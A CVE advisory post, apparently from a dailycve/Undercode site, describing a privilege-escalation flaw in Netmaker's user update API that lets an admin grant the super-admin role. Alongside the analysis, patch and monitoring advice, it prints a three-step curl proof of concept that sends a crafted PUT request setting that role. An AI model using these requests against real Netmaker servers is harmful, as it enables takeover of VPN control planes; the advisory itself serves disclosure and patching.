Netmaker, Privilege Escalation, CVE-2026-29195 (Medium)

Listen to this Post

CVE-2026-29195 is an incorrect authorization vulnerability in the user update handler of Netmaker, a platform for creating virtual private networks with WireGuard. The flaw resides in the `PUT /api/users/{username}` endpoint. While the code logic correctly prevents an administrator from assigning another user the “admin” role, it fails to implement a similar validation check for the “super-admin” role. This omission allows any authenticated user with the admin role to escalate their own privileges or the privileges of another user by simply modifying a user update request to include the super-admin flag. Because the backend does not validate the role change against the principle of least privilege, an admin can effectively grant themselves or any other user full, unrestricted control over the entire Netmaker instance. This issue affects all versions prior to 1.5.0 and has been patched in that release.

dailycve form:

Platform: Netmaker
Version: < 1.5.0
Vulnerability : Privilege Escalation
Severity: Medium
date: March 7, 2026

Prediction: March 9, 2026

What Undercode Say:

Analytics:

The vulnerability is a direct result of missing authorization checks (CWE-863). It requires an authenticated user with existing admin privileges (PR:H) and can be executed remotely over the network (AV:N) with low attack complexity (AC:L). The impact is high on integrity (VI:H) as the attacker can alter user roles to gain full control, but confidentiality and availability are not directly affected. The patch, implemented in version 1.5.0, introduces the necessary validation to block this privilege escalation path.

Exploit:

Exploit Netmaker < 1.5.0 - Privilege Escalation (Admin to Super-Admin)
Date: 2026-03-12
Exploit Author: Undercode
Version: Netmaker before v1.5.0
CVE: CVE-2026-29195
This exploit assumes you have a valid admin session token.
Replace <admin_token>, <netmaker_server>, and <target_username> with your values.
Step 1: Capture the current user details of the target user (e.g., viewing self).
Note: The PUT request is typically used to update user details.
curl -X GET "https://<netmaker_server>/api/users/<target_username>" \
-H "Authorization: Bearer <admin_token>" \
-H "Content-Type: application/json"
Step 2: Craft a malicious PUT request to assign the "super-admin" role.
The vulnerability lies in the lack of server-side validation for the 'role' field.
Even if the UI doesn't allow it, the API accepts the change.
curl -X PUT "https://<netmaker_server>/api/users/<target_username>" \
-H "Authorization: Bearer <admin_token>" \
-H "Content-Type: application/json" \
-d '{
"username": "<target_username>",
"role": "super-admin"
... other user fields (email, password, etc.) can remain the same or be omitted
}'
Step 3: Verify the privilege escalation. The user now has super-admin privileges.
curl -X GET "https://<netmaker_server>/api/users/<target_username>" \
-H "Authorization: Bearer <admin_token>"

Protection from this CVE:

Immediately upgrade to Netmaker version 1.5.0 or later. As a temporary workaround, restrict administrative access to only absolutely trusted users and monitor API logs for unexpected changes to user roles, specifically looking for modifications to the “role” field of any user account.

Impact:

Successful exploitation allows any admin user to gain super-admin privileges. This leads to a complete compromise of the Netmaker control plane, enabling the attacker to manage all networks, nodes, users, and access all WireGuard configurations, potentially leading to unauthorized network access and data breaches.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top